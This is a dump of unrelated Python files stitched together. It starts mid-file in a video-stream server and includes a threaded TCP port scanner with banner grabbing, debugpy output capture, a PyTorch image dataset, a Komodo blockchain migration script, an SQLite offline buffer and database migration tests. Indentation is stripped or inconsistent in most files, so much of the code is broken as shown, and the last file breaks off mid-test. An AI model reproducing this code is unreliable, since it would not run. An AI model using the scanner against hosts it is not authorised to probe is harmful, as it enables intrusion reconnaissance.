cv2.destroyAllWindows()
pygame.quit()
class ManageTCPServer(object):
'allows for tcp server to be shutdown from main'
def setup_server(self, host, port):
self.server = socketserver.TCPServer(server_address=(host, port),
RequestHandlerClass=VideoStreamHandler)
self.server.serve_forever()
def shutdown_server(self):
self.server.shutdown()
if __name__ == '__main__':
manager = ManageTCPServer()
video_thread = threading.Thread(target=manager.setup_server, args=('computer_ip_address', 8000))
video_thread.start()
ih = ImageHandler()
while True:
if q.empty() is False:
master_thread = threading.Thread(target=ih.update_loop, args=('rpi_ip_address', 8001))
master_thread.start()
break
master_thread.join()
manager.shutdown_server()
|
portscanner.py
|
import optparse
from socket import *
from threading import *
screenLock = Semaphore(value=1)
def connScan(tgtHost, tgtPort):
    try:
        connSkt = socket(AF_INET, SOCK_STREAM)
        connSkt.connect((tgtHost, tgtPort))
        connSkt.send(b'ViolentPython\r\n')
        results = connSkt.recv(100)
        screenLock.acquire()
        print('[+] %d/tcp open' % tgtPort)
        print('[+] ' + str(results))
    except:
        screenLock.acquire()
        print('[-] %d/tcp closed' % tgtPort)
    finally:
        screenLock.release()
        connSkt.close()
def protScan(tgtHost, tgtPorts):
    try:
        tgtIP = gethostbyname(tgtHost)
    except:
        print('[-] Cannot resolve "%s": Unknown host' % tgtHost)
        return
    try:
        tgtName = gethostbyaddr(tgtIP)
        print('\n[+] Scan Results for: ' + tgtName[0])
    except Exception:
        print('\n[+] Scan Results for: ' + tgtIP)
setdefaulttimeout(1)
for tgtPort in tgtPorts:
t = Thread(target=connScan, args=(tgtHost, int(tgtPort)))
t.start()
#print 'Scanning port: ' + tgtPort
#connScan(tgtHost, int(tgtPort))
def main():
    parser = optparse.OptionParser('usage: %prog -H <target host> -p <target port>')
parser.add_option('-H', dest='tgtHost', type='string', help='specify target host')
parser.add_option('-p', dest='tgtPort', type='string', help='specify target port[s] separated by comma')
(options, args) = parser.parse_args()
tgtHost = options.tgtHost
tgtPorts = str(options.tgtPort).split(',')
    if options.tgtHost is None or options.tgtPort is None:
        print('[-] You must specify a target host and port[s].')
exit(0)
protScan(tgtHost, tgtPorts)
if __name__ == '__main__':
main()
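# Illustrative invocation (host and ports below are hypothetical examples):
# run the threaded connect scan against a host and a comma-separated port list.
#   python portscanner.py -H scanme.example.com -p 21,22,80,443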
|
output.py
|
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See LICENSE in the project root
# for license information.
from __future__ import absolute_import, division, print_function, unicode_literals
import os
import re
import threading
from debugpy.common import fmt, log
class CapturedOutput(object):
"""Captures stdout and stderr of the debugged process.
"""
def __init__(self, session, **fds):
self.session = session
self._lock = threading.Lock()
self._chunks = {}
self._worker_threads = []
for stream_name, fd in fds.items():
log.info("Capturing {0} {1}", session.debuggee_id, stream_name)
self._capture(fd, stream_name)
def __str__(self):
return fmt("CapturedOutput[{0}]", self.session.id)
def _worker(self, fd, name):
chunks = self._chunks[name]
try:
while True:
try:
chunk = os.read(fd, 0x1000)
except Exception:
break
if not len(chunk):
break
lines = "\n".join(
repr(line) for line, _ in re.findall(b"(.+?(\n|$))", chunk)
)
log.info("{0} {1}:\n{2}", self.session.debuggee_id, name, lines)
with self._lock:
chunks.append(chunk)
finally:
os.close(fd)
def _capture(self, fd, name):
assert name not in self._chunks
self._chunks[name] = []
thread = threading.Thread(
target=lambda: self._worker(fd, name), name=fmt("{0} {1}", self, name)
)
thread.daemon = True
thread.start()
self._worker_threads.append(thread)
def wait(self, timeout=None):
"""Wait for all remaining output to be captured.
"""
if not self._worker_threads:
return
log.debug("Waiting for remaining {0} output...", self.session.debuggee_id)
for t in self._worker_threads:
t.join(timeout)
self._worker_threads[:] = []
def _output(self, which, encoding, lines):
try:
result = self._chunks[which]
except KeyError:
raise AssertionError(
fmt("{0} was not captured for {1}", which, self.session.debuggee_id)
)
with self._lock:
result = b"".join(result)
if encoding is not None:
result = result.decode(encoding)
return result.splitlines() if lines else result
def stdout(self, encoding=None):
"""Returns stdout captured from the debugged process, as a single string.
If encoding is None, returns bytes. Otherwise, returns unicode.
"""
return self._output("stdout", encoding, lines=False)
def stderr(self, encoding=None):
"""Returns stderr captured from the debugged process, as a single string.
If encoding is None, returns bytes. Otherwise, returns unicode.
"""
return self._output("stderr", encoding, lines=False)
def stdout_lines(self, encoding=None):
"""Returns stdout captured from the debugged process, as a list of lines.
If encoding is None, each line is bytes. Otherwise, each line is unicode.
"""
return self._output("stdout", encoding, lines=True)
def stderr_lines(self, encoding=None):
"""Returns stderr captured from the debugged process, as a list of lines.
If encoding is None, each line is bytes. Otherwise, each line is unicode.
"""
return self._output("stderr", encoding, lines=True)
|
dataset.py
|
# -*- coding: utf-8 -*-
import os
import os.path
from queue import Queue
from threading import Thread
import cv2
import torch
import torch.utils.data
import numpy as np
from histogram import match_histograms
def get_loader(my_dataset, device, batch_size, num_workers, shuffle):
""" 根据dataset及设置,获取对应的 DataLoader """
my_loader = torch.utils.data.DataLoader(my_dataset, batch_size=batch_size, num_workers=num_workers,
shuffle=shuffle, pin_memory=True, persistent_workers=(num_workers > 0))
# if torch.cuda.is_available():
# my_loader = CudaDataLoader(my_loader, device=device)
return my_loader
class MatchHistogramsDataset(torch.utils.data.Dataset):
IMG_EXTENSIONS = ['.jpg', '.jpeg', '.png', '.ppm', '.bmp', '.pgm', '.tif']
    def __init__(self, root, transform=None, target_transform=None, is_match_histograms=False, match_mode='hsv',
                 b2a_prob=0.5, match_ratio=1.0):
""" 获取指定的两个文件夹下,两张图像numpy数组的Dataset """
assert len(root) == 2, f'root of MatchHistogramsDataset must has two dir!'
self.dataset_0 = DatasetFolder(root[0])
self.dataset_1 = DatasetFolder(root[1])
self.transform = transform
self.target_transform = target_transform
self.len_0 = len(self.dataset_0)
self.len_1 = len(self.dataset_1)
self.len = max(self.len_0, self.len_1)
self.is_match_histograms = is_match_histograms
self.match_mode = match_mode
        assert self.match_mode in ('hsv', 'hsl', 'rgb'), f"match_mode must be one of ('hsv', 'hsl', 'rgb'), got {self.match_mode}"
self.b2a_prob = b2a_prob
self.match_ratio = match_ratio
def __getitem__(self, index):
sample_0 = self.dataset_0[index] if index < self.len_0 else self.dataset_0[np.random.randint(self.len_0)]
sample_1 = self.dataset_1[index] if index < self.len_1 else self.dataset_1[np.random.randint(self.len_1)]
if self.is_match_histograms:
if self.match_mode == 'hsv':
sample_0 = cv2.cvtColor(sample_0, cv2.COLOR_RGB2HSV_FULL)
sample_1 = cv2.cvtColor(sample_1, cv2.COLOR_RGB2HSV_FULL)
elif self.match_mode == 'hsl':
sample_0 = cv2.cvtColor(sample_0, cv2.COLOR_RGB2HLS_FULL)
sample_1 = cv2.cvtColor(sample_1, cv2.COLOR_RGB2HLS_FULL)
if np.random.rand() < self.b2a_prob:
sample_1 = match_histograms(sample_1, sample_0, rate=self.match_ratio)
else:
sample_0 = match_histograms(sample_0, sample_1, rate=self.match_ratio)
if self.match_mode == 'hsv':
sample_0 = cv2.cvtColor(sample_0, cv2.COLOR_HSV2RGB_FULL)
sample_1 = cv2.cvtColor(sample_1, cv2.COLOR_HSV2RGB_FULL)
elif self.match_mode == 'hsl':
sample_0 = cv2.cvtColor(sample_0, cv2.COLOR_HLS2RGB_FULL)
sample_1 = cv2.cvtColor(sample_1, cv2.COLOR_HLS2RGB_FULL)
if self.transform is not None:
sample_0 = self.transform(sample_0)
sample_1 = self.transform(sample_1)
return sample_0, sample_1
def __len__(self):
return self.len
def __repr__(self):
fmt_str = f'MatchHistogramsDataset for: \n' \
f'{self.dataset_0.__repr__()} \n ' \
f'{self.dataset_1.__repr__()}'
return fmt_str
class DatasetFolder(torch.utils.data.Dataset):
IMG_EXTENSIONS = ['.jpg', '.jpeg', '.png', '.ppm', '.bmp', '.pgm', '.tif']
def __init__(self, root, transform=None):
""" 获取指定文件夹下,单张图像numpy数组的Dataset """
samples = []
for sub_root, _, filenames in sorted(os.walk(root)):
for filename in sorted(filenames):
if os.path.splitext(filename)[-1].lower() in self.IMG_EXTENSIONS:
path = os.path.join(sub_root, filename)
samples.append(path)
if len(samples) == 0:
raise RuntimeError(f"Found 0 files in sub-folders of: {root}\n"
f"Supported extensions are: {','.join(self.IMG_EXTENSIONS)}")
self.root = root
self.samples = samples
self.transform = transform
def __getitem__(self, index):
path = self.samples[index]
sample = cv2.imread(path)[..., ::-1]
if self.transform is not None:
sample = self.transform(sample)
return sample
def __len__(self):
return len(self.samples)
def __repr__(self):
fmt_str = f'Dataset {self.__class__.__name__}\n'\
f' Number of data points: {self.__len__()}\n'\
f' Root Location: {self.root}\n'
tmp = ' Transforms (if any): '
trans_tmp = self.transform.__repr__().replace('\n', '\n' + ' ' * len(tmp))
fmt_str += f'{tmp}{trans_tmp}'
return fmt_str
class CudaDataLoader:
""" 异步预先将数据从CPU加载到GPU中 """
def __init__(self, loader, device, queue_size=2):
self.device = device
self.queue_size = queue_size
self.loader = loader
self.load_stream = torch.cuda.Stream(device=device)
self.queue = Queue(maxsize=self.queue_size)
self.idx = 0
self.worker = Thread(target=self.load_loop)
        self.worker.daemon = True
self.worker.start()
def load_loop(self):
""" 不断的将cuda数据加载到队列里 """
# The loop that will load into the queue in the background
torch.cuda.set_device(self.device)
while True:
for i, sample in enumerate(self.loader):
self.queue.put(self.load_instance(sample))
def load_instance(self, sample):
""" 将batch数据从CPU加载到GPU中 """
if torch.is_tensor(sample):
with torch.cuda.stream(self.load_stream):
return sample.to(self.device, non_blocking=True)
elif sample is None or type(sample) in (list, str):
return sample
elif isinstance(sample, dict):
return {k: self.load_instance(v) for k, v in sample.items()}
else:
return [self.load_instance(s) for s in sample]
def __iter__(self):
self.idx = 0
return self
def __next__(self):
        # the loader worker thread has died
if not self.worker.is_alive() and self.queue.empty():
self.idx = 0
self.queue.join()
self.worker.join()
raise StopIteration
        # finished loading one epoch
elif self.idx >= len(self.loader):
self.idx = 0
raise StopIteration
        # fetch the next batch
else:
out = self.queue.get()
self.queue.task_done()
self.idx += 1
return out
def next(self):
return self.__next__()
def __len__(self):
return len(self.loader)
@property
def sampler(self):
return self.loader.sampler
@property
def dataset(self):
return self.loader.dataset
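# Minimal usage sketch (paths, batch size and device are hypothetical examples):
# build a paired dataset from two image folders, then wrap it with get_loader().
def _dataset_example():
    dataset = MatchHistogramsDataset(
        root=['data/trainA', 'data/trainB'],   # hypothetical folders of images
        is_match_histograms=True,
        match_mode='hsv',
    )
    loader = get_loader(dataset, device='cuda:0', batch_size=4, num_workers=2, shuffle=True)
    for sample_a, sample_b in loader:
        # each sample is a numpy image (or a transformed tensor when a transform is set)
        break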
|
pymigrate_v2.py
|
#!/usr/bin/env python3
from slickrpc import Proxy
import queue
from threading import Thread
import threading
import time
import sys
import datetime
import os
import json
import re
import platform
import calendar
def selectRangeInt(low,high, msg):
while True:
try:
number = int(input(msg))
except ValueError:
print("integer only, try again")
continue
if low <= number <= high:
return number
else:
print("input outside range, try again")
def selectRangeFloat(low,high, msg):
while True:
try:
number = float(input(msg))
except ValueError:
print("integer only, try again")
continue
if low <= number <= high:
return number
else:
print("input outside range, try again")
# define function that fetchs rpc creds from .conf
def def_credentials(chain):
    rpcport = ''
operating_system = platform.system()
if operating_system == 'Darwin':
ac_dir = os.environ['HOME'] + '/Library/Application Support/Komodo'
elif operating_system == 'Linux':
ac_dir = os.environ['HOME'] + '/.komodo'
elif operating_system == 'Win64':
ac_dir = "dont have windows machine now to test"
if chain == 'KMD':
coin_config_file = str(ac_dir + '/komodo.conf')
else:
coin_config_file = str(ac_dir + '/' + chain + '/' + chain + '.conf')
with open(coin_config_file, 'r') as f:
for line in f:
l = line.rstrip()
if re.search('rpcuser', l):
rpcuser = l.replace('rpcuser=', '')
elif re.search('rpcpassword', l):
rpcpassword = l.replace('rpcpassword=', '')
elif re.search('rpcport', l):
rpcport = l.replace('rpcport=', '')
if len(rpcport) == 0:
if chain == 'KMD':
rpcport = 7771
else:
print("rpcport not in conf file, exiting")
print("check "+coin_config_file)
exit(1)
return(Proxy("http://%s:%s@127.0.0.1:%d"%(rpcuser, rpcpassword, int(rpcport))))
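# Illustrative note: def_credentials() expects the chain's .conf file to contain at
# least the standard daemon RPC settings, e.g. (values below are hypothetical):
#   rpcuser=user123
#   rpcpassword=pass123
#   rpcport=12345
# and returns a slickrpc Proxy bound to 127.0.0.1 on that port.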
def print_balance(rpc_connection_source, rpc_connection_destination):
balance_source = rpc_connection_source.getbalance()
balance_destination = rpc_connection_destination.getbalance()
source_chain_name = rpc_connection_source.getinfo()["name"]
destination_chain_name = rpc_connection_destination.getinfo()["name"]
print("Source chain " + source_chain_name + " balance: " + str(balance_source))
print("Destination chain " + destination_chain_name + " balance: " + str(balance_destination) + "\n")
assetChains = []
ccids = []
ID=1
HOME = os.environ['HOME']
try:
with open(HOME + '/StakedNotary/assetchains.json') as file:
assetchains = json.load(file)
except Exception as e:
print(e)
print("Trying alternate location for file")
with open(HOME + '/staked/assetchains.json') as file:
assetchains = json.load(file)
for chain in assetchains:
print(str(ID).rjust(3) + ' | ' + (chain['ac_name']+" ("+chain['ac_cc']+")").ljust(12))
ID+=1
assetChains.append(chain['ac_name'])
ccids.append(chain['ac_cc'])
src_index = selectRangeInt(1,len(assetChains),"Select source chain: ")
src_chain = assetChains[src_index-1]
rpc_connection_sourcechain = def_credentials(src_chain)
rpc_connection_sourcechain1 = def_credentials(src_chain)
rpc_connection_sourcechain2 = def_credentials(src_chain)
ccid=ccids[src_index-1]
assetChains = []
ID=1
for chain in assetchains:
if ccid == chain['ac_cc'] and src_chain != chain['ac_name']:
print(str(ID).rjust(3) + ' | ' + (chain['ac_name']+" ("+chain['ac_cc']+")").ljust(12))
ID+=1
assetChains.append(chain['ac_name'])
if ID != 1:
dest_chain = selectRangeInt(1,len(assetChains),"Select destination chain: ")
else:
print('No other asset chains with the same cc_id to migrate to, exiting')
exit(0)
rpc_connection_destinationchain = def_credentials(assetChains[dest_chain-1])
rpc_connection_destinationchain1 = def_credentials(assetChains[dest_chain-1])
rpc_connection_kmdblockchain = def_credentials('KMD')
migrations_amount = selectRangeInt(1,7778,"How many migrations?: ")
target_migrations = migrations_amount
balance=rpc_connection_sourcechain.getbalance()
max_per_loop=balance/migrations_amount
amount = selectRangeFloat(0,max_per_loop,"Amount of funds to send per migration (max: "+str(max_per_loop)+"): ")
addresses = rpc_connection_destinationchain.listaddressgroupings()
address = addresses[0][0][0]
print('sending to '+address)
BROADCASTED_EXPORT_TXS = 0
CONFIRMED_EXPORT_TXS = 0
CONFIRMED_IMPORT_TXS = 0
BROADCASTED_IMPORT_TXS = 0
IMPORT_TXS_CREATED = 0
IMPORT_TXS_COMPLETED = 0
BRK = []
list_threads = []
print_balance(rpc_connection_sourcechain, rpc_connection_destinationchain)
print("Sending " + str(amount * target_migrations) + " coins from " + rpc_connection_sourcechain.getinfo()["name"] + " chain " +\
"to " + rpc_connection_destinationchain.getinfo()["name"] + " chain\n")
def input_thread(BRK):
input()
BRK.append(None)
def create_export_txs(rpc_connection_source, export_queue, txns_to_send):
while True:
for i in range(txns_to_send):
if BRK: break
raw_transaction = rpc_connection_source.createrawtransaction([], {address: amount})
            while True:
                try:
                    export_data = rpc_connection_source.migrate_converttoexport(raw_transaction, rpc_connection_destinationchain.getinfo()["name"])
                    break
                except Exception as e:
                    print("Src RPC Busy - waiting to convert to export")
                    time.sleep(10)
export_raw = export_data["exportTx"]
export_funded_data = rpc_connection_source.fundrawtransaction(export_raw)
export_funded_transaction = export_funded_data["hex"]
payouts = export_data["payouts"]
signed_hex = rpc_connection_source.signrawtransaction(export_funded_transaction)
            while True:
                try:
                    sent_tx = rpc_connection_source.sendrawtransaction(signed_hex["hex"])
                    break
                except Exception as e:
                    print("Send raw source busy")
                    time.sleep(10)
if len(sent_tx) != 64:
print(signed_hex)
print(sent_tx)
print("Export TX not successfully created")
time.sleep(10)
else:
data_for_queue = {"tx_id": sent_tx, "payouts": payouts, "signed_hex": signed_hex["hex"]}
while True:
try:
export_queue.put(data_for_queue)
break
except:
time.sleep(20)
continue
break
global BROADCASTED_EXPORT_TXS
BROADCASTED_EXPORT_TXS += 1
time.sleep(0.25)
break
def create_import_txs(rpc_connection, queue_with_exports, import_queue):
while True:
data_from_queue = queue_with_exports.get()
while True:
try:
import_tx = rpc_connection.migrate_createimporttransaction(data_from_queue["signed_hex"], data_from_queue["payouts"])
except Exception as e:
print(e)
time.sleep(20)
pass
else:
import_queue.put(import_tx)
global IMPORT_TXS_CREATED
IMPORT_TXS_CREATED += 1
time.sleep(0.2)
break
if IMPORT_TXS_CREATED == BROADCASTED_EXPORT_TXS and IMPORT_TXS_CREATED > 0: break
def migrate_import_txs(rpc_connection, import_txs_queue, migrated_import_txs_queue):
while True:
import_tx = import_txs_queue.get()
while True:
try:
complete_tx = rpc_connection.migrate_completeimporttransaction(import_tx)
except Exception as e:
print(e)
time.sleep(10)
pass
else:
migrated_import_txs_queue.put(complete_tx)
global IMPORT_TXS_COMPLETED
IMPORT_TXS_COMPLETED += 1
time.sleep(0.2)
break
if IMPORT_TXS_COMPLETED == BROADCASTED_EXPORT_TXS and IMPORT_TXS_COMPLETED > 0: break
def broadcast_on_destinationchain(rpc_connection, complete_tx_queue, dest_tx_queue):
while True:
complete_tx = complete_tx_queue.get()
while True:
try:
sent_itx = rpc_connection.sendrawtransaction(complete_tx)
except Exception as e:
print(e)
time.sleep(2.5)
else:
dest_tx_queue.put(sent_itx)
global BROADCASTED_IMPORT_TXS
BROADCASTED_IMPORT_TXS += 1
time.sleep(0.5)
break
if BROADCASTED_IMPORT_TXS == BROADCASTED_EXPORT_TXS and BROADCASTED_IMPORT_TXS > 0: break
def check_if_confirmed_export(rpc_connection, queue_to_check, queue_with_confirmed):
while True:
data_from_queue = queue_to_check.get()
while True:
if int(rpc_connection.gettransaction(data_from_queue["tx_id"])["confirmations"]) > 0:
queue_with_confirmed.put(data_from_queue)
global CONFIRMED_EXPORT_TXS
CONFIRMED_EXPORT_TXS +=1
time.sleep(0.05)
break
else:
time.sleep(20)
if CONFIRMED_EXPORT_TXS == BROADCASTED_EXPORT_TXS and CONFIRMED_EXPORT_TXS > 0: break
def check_if_confirmed_import(rpc_connection, queue_to_check, queue_with_confirmed):
while True:
data_from_queue = queue_to_check.get()
while True:
try:
if int(rpc_connection.getrawtransaction(data_from_queue, 1)["confirmations"]) > 0:
queue_with_confirmed.put(data_from_queue)
global CONFIRMED_IMPORT_TXS
CONFIRMED_IMPORT_TXS += 1
time.sleep(0.25)
break
else:
time.sleep(10)
except Exception as e:
time.sleep(10)
pass
if CONFIRMED_IMPORT_TXS == BROADCASTED_EXPORT_TXS and CONFIRMED_IMPORT_TXS > 0: break
def print_imports():
t0 = time.time()
global IMPORT_TXS_COMPLETED
imports_counter = IMPORT_TXS_COMPLETED
time.sleep(2.5)
while True:
if CONFIRMED_IMPORT_TXS < BROADCASTED_EXPORT_TXS:
t1 = time.time()
if imports_counter == 0:
migrations_per_second = 0
else:
migrations_per_second = (t1 - t0) / imports_counter
            if thread_new_txns.is_alive():
print("Press Enter to quit before " + str(target_migrations) + " broadcasted.")
else:
print("Running remaining tx's through the migration routine")
print("Currently running " + str(threading.active_count() - 2) + " Threads")
print("Export transactions broadcasted: " + str(BROADCASTED_EXPORT_TXS) + " Transactions of: " + str(amount))
print("Export transactions confirmed: " + str(CONFIRMED_EXPORT_TXS) + " Queue: " + str(export_tx_queue.qsize()))
print("Import transactions created: " + str(IMPORT_TXS_CREATED) + " Queue: " + str(confirmed_export_queue.qsize()))
print("Import transactions completed on KMD chain: " + str(IMPORT_TXS_COMPLETED) + " Queue: " + str(import_tx_queue.qsize()))
print("Import transactions broadcasted: " + str(BROADCASTED_IMPORT_TXS) + " Queue: " + str(migrated_import_tx_queue.qsize()))
print("Import transactions confirmed: " + str(CONFIRMED_IMPORT_TXS) + " Queue: " + str(broadcasted_on_dest_queue.qsize()))
print(str((t1 - t0) / 60) + " minutes elapsed")
print(str(CONFIRMED_IMPORT_TXS) + " migrations complete")
print(str(CONFIRMED_IMPORT_TXS / (t1 - t0)) + " migrations/second speed\n")
time.sleep(10)
else:
break
def is_finished():
t0 = time.time()
time.sleep(10)
while True:
if CONFIRMED_IMPORT_TXS < BROADCASTED_EXPORT_TXS and BROADCASTED_EXPORT_TXS > 0:
time.sleep(0.5)
else:
t1 = time.time()
print("_Import transactions confirmed: " + str(CONFIRMED_IMPORT_TXS))
print("_Sent " + str(CONFIRMED_IMPORT_TXS * amount) + " coins")
print(str(t1 - t0) + " _seconds elapsed")
print(str(CONFIRMED_IMPORT_TXS) + " _migrations complete")
print(str(CONFIRMED_IMPORT_TXS / (t1 - t0)) + " _migrations/second speed\n")
print_balance(rpc_connection_sourcechain, rpc_connection_destinationchain)
break
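# Pipeline overview (summarising the threads and queues wired up below):
#   create_export_txs             -> export_tx_queue           (export txs broadcast on the source chain)
#   check_if_confirmed_export     -> confirmed_export_queue    (wait for 1 confirmation on the source chain)
#   create_import_txs             -> import_tx_queue           (migrate_createimporttransaction on the source chain)
#   migrate_import_txs            -> migrated_import_tx_queue  (migrate_completeimporttransaction on the KMD chain)
#   broadcast_on_destinationchain -> broadcasted_on_dest_queue (import txs sent on the destination chain)
#   check_if_confirmed_import     -> confirmed_on_dest_queue   (wait for 1 confirmation on the destination chain)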
# queue of export transactions
export_tx_queue = queue.Queue(maxsize=777)
# queue with confirmed export transactions
confirmed_export_queue = queue.Queue(maxsize=777)
# queue with import transactions
import_tx_queue = queue.Queue()
# queue with complete import transactions
migrated_import_tx_queue = queue.Queue()
# queue with imports broadcasted on destination chain
broadcasted_on_dest_queue = queue.Queue()
# queue with imports confirmed on destination chain
confirmed_on_dest_queue = queue.Queue()
# thread to interupt exports
thread_new_txns = Thread(name = 'service-thread', target=input_thread, args=(BRK,))
list_threads.append(thread_new_txns)
# thread which creating export transactions
thread_export_txs = Thread(name = 'src_exp_create', target=create_export_txs, args=(rpc_connection_sourcechain2, export_tx_queue, target_migrations))
list_threads.append(thread_export_txs)
# thread which waiting for 1 confirmation on the source chain (estabilishing independed rpc proxy for each thread)
thread_wait_export_confirmation = Thread(name = 'src_exp_cnfrm', target=check_if_confirmed_export, args=(rpc_connection_sourcechain1, export_tx_queue, confirmed_export_queue,))
list_threads.append(thread_wait_export_confirmation)
# thread which creating import transactions
thread_import_txs = Thread(name = 'src_imp_create', target=create_import_txs, args=(rpc_connection_sourcechain, confirmed_export_queue, import_tx_queue,))
list_threads.append(thread_import_txs)
# thread which complete import txs on KMD chain
thread_complete_txs = Thread(name = 'KMD_cmplt_imprt', target=migrate_import_txs, args=(rpc_connection_kmdblockchain, import_tx_queue, migrated_import_tx_queue))
list_threads.append(thread_complete_txs)
# thread which trying to broadcast imports on destination chain
thread_broadcast_destination = Thread(name = 'dst_brdcst', target=broadcast_on_destinationchain, args=(rpc_connection_destinationchain, migrated_import_tx_queue, broadcasted_on_dest_queue))
list_threads.append(thread_broadcast_destination)
# thread which waiting for 1 confirmation on destination chain
thread_wait_import_confirmation = Thread(name = 'dst_cnfrm', target=check_if_confirmed_import, args=(rpc_connection_destinationchain1, broadcasted_on_dest_queue, confirmed_on_dest_queue,))
list_threads.append(thread_wait_import_confirmation)
# printer thread
printer_thread = Thread(name = 'printer_thread', target=print_imports)
list_threads.append(printer_thread)
# thread monitoring completion
thread_finished = Thread(name = 'service_exit_thread', target=is_finished)
list_threads.append(thread_finished)
for i in list_threads: i.start()
|
offline_database.py
|
# -*- coding: utf-8 -*-
# ----------------------------------------------------------------------------#
# Copyright © 2015-2016 VMware, Inc. All Rights Reserved. #
# #
# Licensed under the BSD 2-Clause License (the “License”); you may not use #
# this file except in compliance with the License. #
# #
# The BSD 2-Clause License #
# #
# Redistribution and use in source and binary forms, with or without #
# modification, are permitted provided that the following conditions are met:#
# #
# - Redistributions of source code must retain the above copyright notice, #
# this list of conditions and the following disclaimer. #
# #
# - Redistributions in binary form must reproduce the above copyright #
# notice, this list of conditions and the following disclaimer in the #
# documentation and/or other materials provided with the distribution. #
# #
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"#
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE #
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE #
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE #
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR #
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF #
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS #
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN #
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) #
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF #
# THE POSSIBILITY OF SUCH DAMAGE. #
# ----------------------------------------------------------------------------#
import logging
import sqlite3
import threading
import time
from liota.dcc_comms.dcc_comms import DCCComms
from liota.dcc_comms.check_connection import checkConnection
log = logging.getLogger(__name__)
class offline_database:
def __init__(self, table_name, comms, conn=None, data_drain_size=1, draining_frequency=0):
"""
:param table_name: table_name in which message will be stored
:param comms: comms instance of DCCComms
:param draining_frequency: frequency with which data will be published after internet connectivity established.
"""
if not isinstance(table_name, basestring):
log.error("Table name should be a string.")
raise TypeError("Table name should be a string.")
if not isinstance(comms, DCCComms):
log.error("DCCComms object is expected.")
raise TypeError("DCCComms object is expected.")
if not isinstance(draining_frequency, float) and not isinstance(draining_frequency, int):
log.error("draining_frequency is expected of float or int type.")
raise TypeError("draining_frequency is expected of float or int type.")
        if draining_frequency < 0:
            log.error("draining_frequency can't be negative.")
            raise ValueError("draining_frequency can't be negative.")
self.table_name = table_name
if conn is None:
self.internet_conn = checkConnection()
else:
self.internet_conn = conn
self.draining_frequency = draining_frequency
self.data_drain_size = data_drain_size
self.comms = comms
self.flag_conn_open = False
self.draining_in_progress = False
self._offline_db_lock = threading.Lock()
self._create_table()
def _create_table(self):
if self.flag_conn_open is False:
self.conn = sqlite3.connect('storage.db')
try:
with self.conn:
if not self.conn.execute("SELECT name FROM sqlite_master WHERE TYPE='table' AND name= ? ", (self.table_name,)).fetchone():
self.conn.text_factory = str
self.flag_conn_open = True
self.cursor = self.conn.cursor()
self.cursor.execute("CREATE TABLE "+self.table_name+" (Message TEXT)")
self.cursor.close()
del self.cursor
else:
print "Table already there!!!"
except Exception as e:
raise e
finally:
self.flag_conn_open = False
self.conn.close()
def add(self, message):
try:
self.conn = sqlite3.connect('storage.db')
self.flag_conn_open = True
with self.conn:
self.cursor = self.conn.cursor()
print "Adding data to "+ self.table_name
self.cursor.execute("INSERT INTO "+self.table_name+"(Message) VALUES (?);", (message,))
self.cursor.close()
del self.cursor
except sqlite3.OperationalError as e:
raise e
finally:
self.conn.close()
self.flag_conn_open = False
def _drain(self):
self._offline_db_lock.acquire()
self.conn = sqlite3.connect('storage.db')
self.flag_conn_open = True
self.draining_in_progress = True
self.cursor = self.conn.cursor()
self.del_cursor = self.conn.cursor()
data_drained = 0
try:
for row in self.cursor.execute("SELECT Message FROM "+self.table_name):
                if self.comms is not None and self.internet_conn.check:
try:
self.comms.send(row[0])
log.info("Data Drain: {}".format(row[0]))
print "Data drained: ",row[0]
data_drained+=1
self.del_cursor.execute("Delete from "+self.table_name+" where rowid IN (Select rowid from "+self.table_name+" limit 1);")
self.conn.commit()
except Exception as e:
raise e
else: #internet connectivity breaks while draining
log.warning("Internet broke while draining")
break
if data_drained==self.data_drain_size: #if some amt. of data drained thread sleeps for specified draining_freqn.
data_drained=0
time.sleep(self.draining_frequency)
        except Exception as e:
            log.warning("Internet connectivity broke while draining.")
            raise e
finally:
self.del_cursor.close()
del self.del_cursor
self.conn.close()
self.flag_conn_open = False
self.draining_in_progress = False
self._offline_db_lock.release()
def start_drain(self):
queueDrain = threading.Thread(target=self._drain)
queueDrain.daemon = True
queueDrain.start()
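# A minimal usage sketch (not part of the original module); `my_comms` stands for any
# concrete DCCComms implementation and is an assumption here:
#
#   db = offline_database("offline_messages", my_comms,
#                         data_drain_size=5, draining_frequency=2)
#   db.add("temperature=21.5")   # buffer a message while the connection is down
#   db.start_drain()             # background thread replays buffered rows once online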
|
test_backends.py
|
from functools import partial
from tempfile import NamedTemporaryFile
from threading import Thread
import time
from mock import Mock
from mock import call
from mock import patch
import pytest
from yoyo import backends
from yoyo import read_migrations
from yoyo import exceptions
from yoyo.connections import get_backend
from yoyo.tests import get_test_backends
from yoyo.tests import get_test_dburis
from yoyo.tests import with_migrations
class TestTransactionHandling(object):
def test_it_commits(self, backend):
with backend.transaction():
backend.execute("INSERT INTO yoyo_t values ('A')")
with backend.transaction():
rows = list(backend.execute("SELECT * FROM yoyo_t").fetchall())
assert rows == [("A",)]
def test_it_rolls_back(self, backend):
with pytest.raises(backend.DatabaseError):
with backend.transaction():
backend.execute("INSERT INTO yoyo_t values ('A')")
# Invalid SQL to produce an error
backend.execute("INSERT INTO nonexistant values ('A')")
with backend.transaction():
rows = list(backend.execute("SELECT * FROM yoyo_t").fetchall())
assert rows == []
def test_it_nests_transactions(self, backend):
with backend.transaction():
backend.execute("INSERT INTO yoyo_t values ('A')")
with backend.transaction() as trans:
backend.execute("INSERT INTO yoyo_t values ('B')")
trans.rollback()
with backend.transaction() as trans:
backend.execute("INSERT INTO yoyo_t values ('C')")
with backend.transaction():
rows = list(backend.execute("SELECT * FROM yoyo_t").fetchall())
